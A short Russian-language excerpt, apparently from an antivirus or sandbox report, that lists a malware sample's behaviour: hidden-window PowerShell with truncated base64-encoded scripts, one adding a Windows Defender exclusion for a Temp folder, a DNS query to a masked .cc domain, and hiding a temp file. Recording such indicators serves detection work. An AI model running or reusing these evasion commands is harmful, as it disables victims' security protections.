Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -enc IwAgAEcAZQByAGEAIABwAGEAcwB0AGEAIABhAGwAZQBhAHQA8wByAGkAYQAgAGUAIABuAG8AbQBlACAAYQBsAGUAYQB0APMAcgBpAG8AIABwAHIAbwAgAEUAWABFAA0ACgAkAGYAbwBsAGQAZQByACAAPQAgACIAJABlAG4A...
- DNS ASK bn###ntepiou.cc
- '<SYSTEM32>\attrib.exe' +h %TEMP%\fdabe35a-6776-4f2c-af21-21bb7dc22f99
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACIAQwA6AFwAVQBzAGUAcgBzAFwAdQBzAGUAcgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAZ... (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -enc IwAgAEcAZQByAGEAIABwAGEAcwB0AGEAIABhAGwAZQBhAHQA8wByAGkAYQAgAGUAIABuAG8AbQBlACAAYQBsAGUAYQB0APMAcgBpAG8AIABwAHIAbwAgAEUAWABFAA0ACgAkAGYAbwBsAGQAZQByACAAPQAgACIAJABlAG4A... (со скрытым окном)